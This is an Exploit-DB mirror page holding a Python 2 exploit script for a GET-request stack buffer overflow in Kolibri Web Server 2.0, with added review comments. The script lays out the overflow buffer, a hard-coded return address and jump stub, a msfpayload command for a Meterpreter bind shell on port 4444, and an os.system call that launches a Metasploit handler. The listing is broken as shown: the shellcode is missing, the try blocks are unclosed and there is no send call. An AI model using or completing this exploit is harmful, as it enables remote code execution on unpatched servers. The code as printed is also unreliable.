Kolibri Web Server 2.0 – GET Stack Buffer Overflow

  • 作者: Polunchis
    日期: 2014-04-25
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/33027/
  • #!/usr/bin/python 
    # Exploit Title: Kolibri GET request Stack buffer Overflow 
    # Date: 25 April 2014
    # Exploit Author: Christian (Polunchis) Ramirez https://intrusionlabs.org
    # Vendor Homepage: http://www.senkas.com/kolibri/download.php
    # Version: Kolibri 2.0 
    # Tested on: Windows XP SP3,Spanish
    # Thanks:To my wife for putting up with my possessions
    # Description: 
    # A buffer overflow is triggered when a long GET command is sent to the server.
    #
    # NOTE(review): this mirrored listing is not a complete program. The
    # `shellcode = (` tuple below is never closed, the try/except scaffolding
    # that the tab-indented lines belonged to is missing, and the usage check
    # has no exit. It is kept as a record of the bug class, not as runnable
    # code; nothing is reconstructed here.
    #
    # Risk and detection summary, from the code as shown: one HTTP GET whose
    # request path is 590 bytes (515 + 4 + 11 + 60, see `buffer`) of mostly
    # repeated "A"/"C"/"B" characters overflows a stack buffer in Kolibri 2.0
    # on the tested platform; the intended payload is a bind shell on TCP/4444
    # (see the handler command near the end). Over-long request lines and a
    # new listener on 4444 are the observable indicators; the remedy is to
    # retire or patch Kolibri 2.0 and keep it off untrusted networks.
    # Python 2 source: `print` statements, byte escapes inside plain str.
    import socket, sys, os, time 
    # Usage check. No sys.exit() follows the message in this mirror, so a
    # missing argument would presumably fall through to an IndexError on
    # sys.argv[1] below.
    if len(sys.argv) != 3:
    	print "[*] Uso: %s <Ip Victima> <Puerto> \n" % sys.argv[0]
    print "[*] Exploit created by Polunchis"
    print "[*] https://www.intrusionlabs.com.mx"
    host = sys.argv[1] 
    port = int(sys.argv[2])
    # The payload was generated externally with the command on the next line
    # (excluded bytes listed after -b); the tuple body is absent from this
    # listing, so len(shellcode) below cannot be evaluated as shown.
    #./msfpayload windows/meterpreter/bind_tcp R | ./msfencode -t c -b '\x00\xff\x0a\x0d\x20\x40'
    shellcode = (
    # Lead-in: 33 "A" bytes followed by 20 NOP bytes (53 bytes).
    nop ="A" * 33 + '\x90' * 20
    # Filler sized so that nop + shellcode + junk is exactly 515 bytes.
    junk = "C" *(515-(len(nop)+len(shellcode)))
    # Hard-coded 11-byte machine-code stub placed after the return address.
    opcode= "\x83\xc4\x44\x83\xc4\x44\x83\xc4\x44\xff\xe4"
    # Overwritten return address, little-endian 0x7C924663; the author's
    # comment on the next line records it as a `call esp`. It is a fixed
    # address, so presumably only valid on the "Tested on" build named in the
    # header -- the crash is the portable part, code execution is not.
    eip = '\x63\x46\x92\x7c'
    #7c86467b 7C924663 call esp
    # 515 + 4 + 11 + 60 = 590 bytes sent as the request path.
    buffer = nop + shellcode + junk + eip + opcode + "B" * 60 
    # The overflow rides in the request line; the remaining headers are
    # ordinary and only make the request look like a browser.
    req = ("GET /" + buffer + " HTTP/1.1\r\n"
    "Host: " + host + ":" + str(port) + "\r\n"
    "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv: Gecko/20101026 Firefox/3.6.12\r\n"
    "Connection: keep-alive\r\n\r\n")
    print "[+] Connecting to %s:%d" % (host, port)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # The tab-indented lines from here on were the body of a try block whose
    # header is missing from this mirror; note that no s.send(req) line
    # survives either, and `data` is read but never used.
    	s.connect((host, port))
    	print "[+] Sending payload.." + "nop: " + str(len(nop)) + " junk: " + str(len(junk)) + " shellcode: " + str(len(shellcode))
    	data = s.recv(1024)
    	print "[+] Closing connection.."
    	print "[+] Exploit Sent Successfully"
    	print "[+] Waiting for 3 sec before spawning shell to " + host + ":4444\r"
    	print "\r"
    # Hands off to a Metasploit handler for the bind_tcp payload via a shell
    # command. As written RHOST= is empty (the host variable is not
    # interpolated), so this line is incomplete even apart from the missing
    # try/except structure.
    os.system("msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST= LPORT=4444 E")
    # The two messages below read like except-branch output (connection lost /
    # refused); their except headers are not present in this listing.
    	print "[-] Connection lost from " + host + ":4444 \r"
    	print "[-] Could not connect to " + host + ":4444\r"